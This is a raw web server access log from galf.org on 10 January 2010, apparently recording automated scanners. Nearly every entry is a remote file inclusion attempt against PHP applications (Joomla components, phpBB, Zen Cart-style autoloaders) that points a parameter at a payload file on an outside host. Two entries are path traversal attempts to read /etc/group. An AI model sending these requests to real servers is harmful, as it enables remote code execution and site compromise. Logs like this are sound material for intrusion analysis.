74.223.143.131 - - [10/Jan/2010:22:42:26 -0800] "GET /logs/access_090824.log//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:52 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:52 -0800] "GET /logs/access_090824.log//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:52 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:54 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:55 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:55 -0800] "GET /cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:55 -0800] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:55 -0800] "GET /logs/access_090824.log//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [10/Jan/2010:22:42:56 -0800] "GET /logs/access_090824.log//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.37 - - [10/Jan/2010:22:43:45 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {79E6E743-982D-430C-B6E1-65E2EA3F4761}; SV1; .NET CLR 1.1.4322)" "www.galf.org"
207.228.240.75 - - [10/Jan/2010:22:45:23 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
207.228.240.75 - - [10/Jan/2010:22:45:25 -0800] "GET /admin/index.php?_SERVER[ConfigFile]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:47:56 -0800] "GET /logs/access_091214.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:48:13 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:48:13 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:48:13 -0800] "GET /logs/access_091214.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:48:38 -0800] "GET /logs/access_090706.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:48:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:48:38 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:22:51:24 -0800] "GET /logs/access_091116.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:22:51:24 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:22:51:24 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:51:46 -0800] "GET /logs/access_090921.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:51:46 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:51:46 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:22:51:54 -0800] "GET /logs/access_090831.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:51:54 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:51:54 -0800] "GET /logs/access_090921.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:51:54 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
189.109.23.178 - - [10/Jan/2010:22:52:01 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:52:26 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:52:26 -0800] "GET /logs/access_090907.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:52:26 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:52:44 -0800] "GET /logs/access_090720.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:53:07 -0800] "GET /logs/access_090921.log///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:53:07 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:53:07 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:54:00 -0800] "GET /logs/access_090921.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:54:00 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:22:54:00 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:55:06 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:55:06 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:55:06 -0800] "GET /logs/access_090921.log///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:56:30 -0800] "GET /logs/access_090921.log%20%20///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:56:30 -0800] "GET //?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:56:30 -0800] "GET /logs///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:56:41 -0800] "GET /logs/access_090907.log%20%20///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:56:53 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:56:53 -0800] "GET /logs/access_091214.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:56:53 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:57:23 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:57:23 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:57:23 -0800] "GET /logs/access_091214.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:22:58:51 -0800] "GET /logs/access_090720.log///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:58:55 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:59:00 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:22:59:00 -0800] "GET /logs/access_090706.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:23:00:35 -0800] "GET /logs/access_090921.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:23:00:53 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:23:00:53 -0800] "GET /logs/access_091214.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:23:00:53 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:23:01:12 -0800] "GET /logs/access_090720.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:23:01:13 -0800] "GET /logs/access.log//?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:23:01:13 -0800] "GET /?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:23:01:13 -0800] "GET /logs//?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:23:02:03 -0800] "GET /?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:23:02:03 -0800] "GET /logs//?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:23:02:03 -0800] "GET /logs/access.log//?_zb_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.24.35.80 - - [10/Jan/2010:23:02:35 -0800] "GET /logs/access_090720.log///?sourcedir=http://ipod69.webng.com/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:23:05:13 -0800] "GET /logs/access_090706.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:23:08:40 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:23:08:40 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:23:08:43 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:09:09 -0800] "GET /logs/?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 200 4783 "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:09:09 -0800] "GET /logs/access_091207.log%20%20/?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:09:09 -0800] "GET /?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:09:13 -0800] "GET /logs/?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 200 4783 "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:09:14 -0800] "GET /logs/access_091207.log%20%20/?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:09:14 -0800] "GET /?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [10/Jan/2010:23:10:34 -0800] "GET /logs/access.log//admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
74.200.89.25 - - [10/Jan/2010:23:10:34 -0800] "GET /admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
74.200.89.25 - - [10/Jan/2010:23:10:34 -0800] "GET /logs//admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
66.221.91.55 - - [10/Jan/2010:23:10:35 -0800] "GET /logs/access_091123.log%20%20/?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.221.91.55 - - [10/Jan/2010:23:10:41 -0800] "GET /logs/access_091123.log%20%20/?INCLUDE_FOLDER=http://neokult.com/img/open.jpg??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:11:17 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:11:17 -0800] "GET /logs/access_091109.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:11:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:33 -0800] "GET /logs/access_091109.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:33 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:42 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:42 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:42 -0800] "GET /logs/access_091130.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:46 -0800] "GET /logs/access_100104.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:46 -0800] "GET /logs/access_091123.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [10/Jan/2010:23:11:46 -0800] "GET /logs/access_090907.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:11:56 -0800] "GET /logs/access_091130.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:23:12:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.12.13.152 - - [10/Jan/2010:23:12:10 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.12.13.152 - - [10/Jan/2010:23:12:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.12.13.152 - - [10/Jan/2010:23:12:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:23:12:10 -0800] "GET /logs/access_100104.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [10/Jan/2010:23:12:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:12:54 -0800] "GET /logs/access_091123.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:12:54 -0800] "GET /logs/access_100104.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:12:54 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [10/Jan/2010:23:12:59 -0800] "GET /logs/access_090907.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.215.158 - - [10/Jan/2010:23:13:18 -0800] "GET /?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
189.19.215.158 - - [10/Jan/2010:23:13:19 -0800] "GET /logs/access.log/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.19.215.158 - - [10/Jan/2010:23:13:19 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [10/Jan/2010:23:14:07 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [10/Jan/2010:23:14:07 -0800] "GET /logs/access_100104.log//tools/send_reminders.php?noSet=0&includedir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [10/Jan/2010:23:15:04 -0800] "GET /logs/access_090720.log///?sourcedir=http://ipod69.webng.com/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.200.89.25 - - [10/Jan/2010:23:15:11 -0800] "GET /admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
74.200.89.25 - - [10/Jan/2010:23:15:37 -0800] "GET /admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [10/Jan/2010:23:16:32 -0800] "GET /logs/access_100104.log//admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
74.200.89.25 - - [10/Jan/2010:23:16:32 -0800] "GET /admin/admin_users.php?phpbb_root_path=http://www.interdomain.at/images/.idmic22?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
